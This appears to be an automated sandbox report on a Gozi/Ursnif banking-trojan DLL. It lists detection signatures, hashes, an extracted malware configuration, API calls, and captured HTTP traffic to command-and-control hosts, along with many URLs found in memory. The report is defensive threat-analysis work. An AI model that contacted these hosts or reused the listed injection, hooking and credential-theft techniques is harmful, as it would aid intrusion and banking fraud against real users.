Analysis Report NJPcHPuRcG.dll

Overview

General Information

Sample Name:	NJPcHPuRcG.dll
Analysis ID:	353243
MD5:	48ac334e786156ef605b82dd563373f4
SHA1:	1710cf3539eaaf618a613e690157adf30550fade
SHA256:	71b928fd0b29e21bbfa4755b5347f4dc40653a82ec7ecf4947e325dbec23abaa
Tags:	dllGoziISFBUrsnif
Most interesting Screenshot:

Detection

Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Gozi e-Banking trojan

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Suspicious powershell command line found

Tries to steal Mail credentials (via file access)

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: regsvr32.exe.6448.2.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "153", "system": "a271e0af49f6ad8f6473361d635135dbhh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613453205", "user": "1082ab698695dc15e71ab15cb0e88a2a", "hash": "0xf857f57e", "soft": "3"}

Multi AV Scanner detection for submitted file

Source: NJPcHPuRcG.dll

Virustotal: Detection: 15%

Perma Link

Compliance:

Uses 32bit PE files

Source: NJPcHPuRcG.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49750 version: TLS 1.2

Binary contains paths to debug symbols

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001B.00000002.386301089.000001BF2C130000.00000002.00000001.sdmp, csc.exe, 0000001E.00000002.395773551.0000021C02EB0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_02773512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_02773512
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05415518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	2_2_05415518
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05404CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	2_2_05404CF1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	2_2_0540B88D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_0540834C

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_054016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

2_2_054016E1

Networking:

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 104.20.184.68 104.20.184.68

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /api1/QSqnACLeyr6hdgRM/z5FskeEfxxW4Q1R/GsITkxgk46HCnUm5Kd/11eB4QB_2/FS2OIfou_2BVahhCN2i1/lN05g44fSdWuZ34SVM_/2F18tQh3ZP_2B9CZltVRIM/NAJawsHjH4mX4/XILaVciO/5e8TUIFZ7ccd8Dn_2F8wtDN/DA_2BihyHs/BqbIiQ7x5yFYJOUsg/scHsHuDvL_2F/a38zFWCcfG3/xo4sCKeZx_2FgB/qzrd3KTzhXtd1iKJfTVBW/TIaj2x4Rf3CB0n8w/wlBMav7PHwJXLsZ/IliJcWNYhk60Yrdjmm/3OHtbL5dY/ANYcc2W_2Bf_2FIiYenV/jXNvqJX5m02G5/F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/9a3FdV_2FOe2lNWBzywhye/a2rzbdQuOhRbh/1tMI9TP_/2FFHpcEjc2zIsj3nY_2FaRD/bbKOnK6Aw9/T9Li8ZpaG0hs_2FEE/_2B0kgl3vplN/HPMJmXJvTbm/kjHzz19HUtkaT1/4BDTN7ZVSNKtMR3H5nP4a/s8_2F3CxujepwtCo/By36bxNYadNwz_2/FEk2aSXfXLicJH7n4U/7D_2FTfi5/cc2nrD5Ag2qXRkQmnDt6/1GTWH5aoTuyoAdeDUx1/UqFEv13ML45n9P1f5D7a2h/spqio1V138YVU/_2FSoCJL/_2BPfPH_2FwmC1xDPsgb90b/lJFlQYaXBd/gV1Ci2eCEez/TspIchn HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm6BSIFzHirA83QDIG_/2FbmOJUxF8/ud5_2Fql9hZq1SzAT/Mwor9Yan0pTL/Fp7ZNYW1P4i/kA3p_2Ft9A_2Fs/RuUNpyL5CsQBX14_2BDvT/1fDvmlCtb0dss45p/clOsmGOkIAiGzqR/LxhkYHtCoZLc014ID_/2BtL4MOOe/oIJGNpJMiO7LF1VXD1cY/3TSy0R_2FzpOndwhSFh/jEmLA5uqXYEdrQwipf8a_2/FYxkdf4zOPfe0/vr4tnHHd/_2Fh2Azy7z8mKYRQWXwGF6y/SDOEEBL HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/AV8RjqvumRQ/OvLh7PdTNMKGa7/3LP4_2BG3LRcoZojWSk5u/NsORJjPn_2Fv_2B1/6Rz2NQs3_2FAyK6/XQQdYcU_2Fse_2F2j3/Zr9Hx_2Ba/98olXIGwinJCl_2FG4zm/M7DRWkrkSQ3KxF_2B9c/y19JwEmq4VBfpQCfptESLl/3GITd_2BqQxr2/SZAx9P1V/YikBhoAaQcpPJtcNJcJIY1_/2BjEuQfwCu/DUjEswX2uyguNEfAU/ZGf5P4bm4kOR/ZxxrQAreiF2/UPHWjC6fJcwkvj/jLEwRcMGH9odoyp8GuEAA/_2BQntTJU4ER5IW5/BN_2BQxL/y8vbI87 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at

Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp	String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp	String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 3653 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp	String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365g equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: unknown

HTTP traffic detected: POST /api1/bXII_2FHb0focJwi2/NKTIw_2FgiKf/ws9atmb5xre/8ghQ36n3SNQg84/1PN9WyLcQDb7Ra3wHIhjp/FiUmpJqa00TMQIaH/_2BHj0Q4IM1ltM6/5khUyF_2BRsPcD5Q37/C_2FE9BKN/CafUcW267Vk_2FIY_2Bn/_2BcfZsnCXmPwjFlUTt/pXytrrnaXNmzXOHxla9mOU/6X7At_2B8RTFx/TPw_2FzM/jbcnoszV5Xhd9jlATPIAobN/UMGaXl3YDQ/Krg2ExScIQW_2Fg_2/BTQ5TzTymRNC/sxopWB80XHY/7SN_2FkITnVhH7/8XPMTwHoJBXOcWd_2Fyk4/T_2Bzs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 15 Feb 2021 20:26:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000024.00000000.435365866.000000000DC20000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm
Source: explorer.exe, 00000024.00000002.622432567.00000000053A0000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3w
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: regsvr32.exe, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000019.00000003.444661390.000001BFEACB7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
